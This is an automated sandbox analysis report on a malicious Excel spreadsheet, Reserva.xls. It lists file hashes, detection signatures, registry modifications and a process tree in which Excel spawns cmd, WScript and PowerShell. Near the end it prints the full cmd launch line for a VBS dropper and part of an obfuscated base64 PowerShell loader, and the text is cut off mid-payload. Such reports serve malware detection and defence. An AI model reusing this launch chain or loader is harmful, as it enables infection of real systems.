23a43356377f3202cc3dfc099e0966881e4069d7159ff7f8c8ea5638ecb93ae7

General

Target

Reserva.xls
Size

754KB
MD5

3bcf5f59bf2674ed3d5873037e6facf9
SHA1

c30056cf0d3d6d484bc70d90e25797d314ad130d
SHA256

23a43356377f3202cc3dfc099e0966881e4069d7159ff7f8c8ea5638ecb93ae7
SHA512

fa3a9d4ee97a6a8f9d23bb17c2b466db85c01b0837f45c0150d35053db9616fc68d23e0ec09b3f3e6a5729c633496c8031ad208df71b2b679d8bbfcd1610787e
SSDEEP

12288:JoPIj/NtKmSvwtfNsHv38KHa1eYNqscnYwclMZWeVQOgiHviwa4cekHW:wIT6uNsHv3shPcnY5uZN++HKwnAW

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2516	840	cmd.exe	EXCEL.EXE

Blocklisted process makes network request 2 IoCs

Processes:

WScript.exe

flow pid process

16 1960 WScript.exe
17 1960 WScript.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE

flow	pid	process
16	1960	WScript.exe
17	1960	WScript.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

EXCEL.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE

Modifies registry class 64 IoCs

Processes:

EXCEL.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe	EXCEL.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2504 PING.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

840 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2428 powershell.exe
2184 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2428 powershell.exe
Token: SeDebugPrivilege 2184 powershell.exe
Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

EXCEL.EXE

pid process

840 EXCEL.EXE
840 EXCEL.EXE
840 EXCEL.EXE

pid	process
2504	PING.EXE

pid	process
840	EXCEL.EXE

pid	process
2428	powershell.exe
2184	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2428	powershell.exe
Token: SeDebugPrivilege	2184	powershell.exe

pid	process
840	EXCEL.EXE
840	EXCEL.EXE
840	EXCEL.EXE

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

EXCEL.EXEcmd.exeWScript.exepowershell.exe

description	pid	process	target process
PID 840 wrote to memory of 2516	840	EXCEL.EXE	cmd.exe
PID 840 wrote to memory of 2516	840	EXCEL.EXE	cmd.exe
PID 840 wrote to memory of 2516	840	EXCEL.EXE	cmd.exe
PID 840 wrote to memory of 2516	840	EXCEL.EXE	cmd.exe
PID 2516 wrote to memory of 2504	2516	cmd.exe	PING.EXE
PID 2516 wrote to memory of 2504	2516	cmd.exe	PING.EXE
PID 2516 wrote to memory of 2504	2516	cmd.exe	PING.EXE
PID 2516 wrote to memory of 2504	2516	cmd.exe	PING.EXE
PID 2516 wrote to memory of 1960	2516	cmd.exe	WScript.exe
PID 2516 wrote to memory of 1960	2516	cmd.exe	WScript.exe
PID 2516 wrote to memory of 1960	2516	cmd.exe	WScript.exe
PID 2516 wrote to memory of 1960	2516	cmd.exe	WScript.exe
PID 1960 wrote to memory of 2428	1960	WScript.exe	powershell.exe
PID 1960 wrote to memory of 2428	1960	WScript.exe	powershell.exe
PID 1960 wrote to memory of 2428	1960	WScript.exe	powershell.exe
PID 1960 wrote to memory of 2428	1960	WScript.exe	powershell.exe
PID 2428 wrote to memory of 2184	2428	powershell.exe	powershell.exe
PID 2428 wrote to memory of 2184	2428	powershell.exe	powershell.exe
PID 2428 wrote to memory of 2184	2428	powershell.exe	powershell.exe
PID 2428 wrote to memory of 2184	2428	powershell.exe	powershell.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Reserva.xls
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:840

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & start C:\Users\Public\document.vbs
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2516

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 10
3⤵
- Runs ping.exe
PID:2504

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\document.vbs"
3⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1960

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $DlEAp = 'J℅⚓♲B3℅⚓♲Gk℅⚓♲egBV℅⚓♲G4℅⚓♲I℅⚓♲℅⚓♲9℅⚓♲C℅⚓♲℅⚓♲RwBl℅⚓♲HQ℅⚓♲LQBD℅⚓♲Gk℅⚓♲bQBJ℅⚓♲G4℅⚓♲cwB0℅⚓♲GE℅⚓♲bgBj℅⚓♲GU℅⚓♲I℅⚓♲B3℅⚓♲Gk℅⚓♲bg℅⚓♲z℅⚓♲DI℅⚓♲XwBj℅⚓♲G8℅⚓♲bQBw℅⚓♲HU℅⚓♲d℅⚓♲Bl℅⚓♲HI℅⚓♲cwB5℅⚓♲HM℅⚓♲d℅⚓♲Bl℅⚓♲G0℅⚓♲Ow℅⚓♲k℅⚓♲Fg℅⚓♲cwBR℅⚓♲F℅⚓♲℅⚓♲VQ℅⚓♲g℅⚓♲D0℅⚓♲I℅⚓♲℅⚓♲k℅⚓♲Hc℅⚓♲aQB6℅⚓♲FU℅⚓♲bg℅⚓♲u℅⚓♲E0℅⚓♲YQBu℅⚓♲HU℅⚓♲ZgBh℅⚓♲GM℅⚓♲d℅⚓♲B1℅⚓♲HI℅⚓♲ZQBy℅⚓♲Ds℅⚓♲aQBm℅⚓♲C℅⚓♲℅⚓♲K℅⚓♲℅⚓♲k℅⚓♲Fg℅⚓♲cwBR℅⚓♲F℅⚓♲℅⚓♲VQ℅⚓♲u℅⚓♲EM℅⚓♲bwBu℅⚓♲HQ℅⚓♲YQBp℅⚓♲G4℅⚓♲cw℅⚓♲o℅⚓♲Cc℅⚓♲VgBN℅⚓♲Hc℅⚓♲YQBy℅⚓♲GU℅⚓♲Jw℅⚓♲p℅⚓♲C℅⚓♲℅⚓♲LQBv℅⚓♲HI℅⚓♲I℅⚓♲℅⚓♲k℅⚓♲Fg℅⚓♲cwBR℅⚓♲F℅⚓♲℅⚓♲VQ℅⚓♲u℅⚓♲EM℅⚓♲bwBu℅⚓♲HQ℅⚓♲YQBp℅⚓♲G4℅⚓♲cw℅⚓♲o℅⚓♲Cc℅⚓♲VgBp℅⚓♲HI℅⚓♲d℅⚓♲B1℅⚓♲GE℅⚓♲b℅⚓♲BC℅⚓♲G8℅⚓♲e℅⚓♲℅⚓♲n℅⚓♲Ck℅⚓♲I℅⚓♲℅⚓♲t℅⚓♲G8℅⚓♲cg℅⚓♲g℅⚓♲CQ℅⚓♲W℅⚓♲Bz℅⚓♲FE℅⚓♲U℅⚓♲BV℅⚓♲C4℅⚓♲QwBv℅⚓♲G4℅⚓♲d℅⚓♲Bh℅⚓♲Gk℅⚓♲bgBz℅⚓♲Cg℅⚓♲JwBI℅⚓♲Hk℅⚓♲c℅⚓♲Bl℅⚓♲HI℅⚓♲LQBW℅⚓♲Cc℅⚓♲KQ℅⚓♲p℅⚓♲C℅⚓♲℅⚓♲ew℅⚓♲7℅⚓♲GU℅⚓♲e℅⚓♲Bp℅⚓♲HQ℅⚓♲OwB9℅⚓♲Ds℅⚓♲J℅⚓♲BP℅⚓♲FE℅⚓♲dwBo℅⚓♲GQ℅⚓♲I℅⚓♲℅⚓♲9℅⚓♲C℅⚓♲℅⚓♲Jw℅⚓♲l℅⚓♲Gk℅⚓♲VQBZ℅⚓♲FI℅⚓♲YQ℅⚓♲l℅⚓♲Cc℅⚓♲Ow℅⚓♲k℅⚓♲GU℅⚓♲d℅⚓♲Bh℅⚓♲Hc℅⚓♲Rg℅⚓♲g℅⚓♲D0℅⚓♲I℅⚓♲℅⚓♲n℅⚓♲CU℅⚓♲egBL℅⚓♲EE℅⚓♲QQBZ℅⚓♲CU℅⚓♲Jw℅⚓♲7℅⚓♲Fs℅⚓♲QgB5℅⚓♲HQ℅⚓♲ZQBb℅⚓♲F0℅⚓♲XQ℅⚓♲g℅⚓♲CQ℅⚓♲T℅⚓♲Bi℅⚓♲Fk℅⚓♲awBW℅⚓♲C℅⚓♲℅⚓♲PQ℅⚓♲g℅⚓♲Fs℅⚓♲UwB5℅⚓♲HM℅⚓♲d℅⚓♲Bl℅⚓♲G0℅⚓♲LgBD℅⚓♲G8℅⚓♲bgB2℅⚓♲GU℅⚓♲cgB0℅⚓♲F0℅⚓♲Og℅⚓♲6℅⚓♲EY℅⚓♲cgBv℅⚓♲G0℅⚓♲QgBh℅⚓♲HM℅⚓♲ZQ℅⚓♲2℅⚓♲DQ℅⚓♲UwB0℅⚓♲HI℅⚓♲aQBu℅⚓♲Gc℅⚓♲K℅⚓♲℅⚓♲g℅⚓♲CQ℅⚓♲ZQB0℅⚓♲GE℅⚓♲dwBG℅⚓♲C4℅⚓♲UgBl℅⚓♲H℅⚓♲℅⚓♲b℅⚓♲Bh℅⚓♲GM℅⚓♲ZQ℅⚓♲o℅⚓♲Cc℅⚓♲kyE6℅⚓♲JMhJw℅⚓♲s℅⚓♲C℅⚓♲℅⚓♲JwBB℅⚓♲Cc℅⚓♲KQ℅⚓♲g℅⚓♲Ck℅⚓♲OwBb℅⚓♲FM℅⚓♲eQBz℅⚓♲HQ℅⚓♲ZQBt℅⚓♲C4℅⚓♲QQBw℅⚓♲H℅⚓♲℅⚓♲R℅⚓♲Bv℅⚓♲G0℅⚓♲YQBp℅⚓♲G4℅⚓♲XQ℅⚓♲6℅⚓♲Do℅⚓♲QwB1℅⚓♲HI℅⚓♲cgBl℅⚓♲G4℅⚓♲d℅⚓♲BE℅⚓♲G8℅⚓♲bQBh℅⚓♲Gk℅⚓♲bg℅⚓♲u℅⚓♲Ew℅⚓♲bwBh℅⚓♲GQ℅⚓♲K℅⚓♲℅⚓♲g℅⚓♲CQ℅⚓♲T℅⚓♲Bi℅⚓♲Fk℅⚓♲awBW℅⚓♲C℅⚓♲℅⚓♲KQ℅⚓♲u℅⚓♲Ec℅⚓♲ZQB0℅⚓♲FQ℅⚓♲eQBw℅⚓♲GU℅⚓♲K℅⚓♲℅⚓♲n℅⚓♲EM℅⚓♲b℅⚓♲Bh℅⚓♲HM℅⚓♲cwBM℅⚓♲Gk℅⚓♲YgBy℅⚓♲GE℅⚓♲cgB5℅⚓♲DM℅⚓♲LgBD℅⚓♲Gw℅⚓♲YQBz℅⚓♲HM℅⚓♲MQ℅⚓♲n℅⚓♲Ck℅⚓♲LgBH℅⚓♲GU℅⚓♲d℅⚓♲BN℅⚓♲GU℅⚓♲d℅⚓♲Bo℅⚓♲G8℅⚓♲Z℅⚓♲℅⚓♲o℅⚓♲Cc℅⚓♲c℅⚓♲By℅⚓♲EY℅⚓♲VgBJ℅⚓♲Cc℅⚓♲KQ℅⚓♲u℅⚓♲Ek℅⚓♲bgB2℅⚓♲G8℅⚓♲awBl℅⚓♲Cg℅⚓♲J℅⚓♲Bu℅⚓♲HU℅⚓♲b℅⚓♲Bs℅⚓♲Cw℅⚓♲I℅⚓♲Bb℅⚓♲G8℅⚓♲YgBq℅⚓♲GU℅⚓♲YwB0℅⚓♲Fs℅⚓♲XQBd℅⚓♲C℅⚓♲℅⚓♲K℅⚓♲℅⚓♲n℅⚓♲HI℅⚓♲ZQB3℅⚓♲GU℅⚓♲aQB2℅⚓♲D0℅⚓♲ZQBj℅⚓♲HI℅⚓♲dQBv℅⚓♲HM℅⚓♲XwBt℅⚓♲HQ℅⚓♲dQ℅⚓♲/℅⚓♲HQ℅⚓♲e℅⚓♲B0℅⚓♲C4℅⚓♲Mw℅⚓♲y℅⚓♲D℅⚓♲℅⚓♲Mg℅⚓♲u℅⚓♲DI℅⚓♲MQ℅⚓♲u℅⚓♲DQ℅⚓♲M℅⚓♲℅⚓♲v℅⚓♲GQ℅⚓♲YQBv℅⚓♲Gw℅⚓♲bgB3℅⚓♲G8℅⚓♲Z℅⚓♲℅⚓♲v℅⚓♲E8℅⚓♲OQ℅⚓♲4℅⚓♲Dk℅⚓♲MQB1℅⚓♲GU℅⚓♲Zw℅⚓♲v℅⚓♲G0℅⚓♲bwBj℅⚓♲C4℅⚓♲d℅⚓♲Bo℅⚓♲Gc℅⚓♲aQB6℅⚓♲C4℅⚓♲ZQBy℅⚓♲GE℅⚓♲a℅⚓♲Bz℅⚓♲C8℅⚓♲Lw℅⚓♲6℅⚓♲HM℅⚓♲c℅⚓♲B0℅⚓♲HQ℅⚓♲a℅⚓♲℅⚓♲n℅⚓♲C℅⚓♲℅⚓♲L℅⚓♲℅⚓♲g℅⚓♲CQ℅⚓♲TwBR℅⚓♲Hc℅⚓♲a℅⚓♲Bk℅⚓♲C℅⚓♲℅⚓♲L℅⚓♲℅⚓♲g℅⚓♲Cc℅⚓♲V℅⚓♲By℅⚓♲HU℅⚓♲ZQ℅⚓♲n℅⚓♲C℅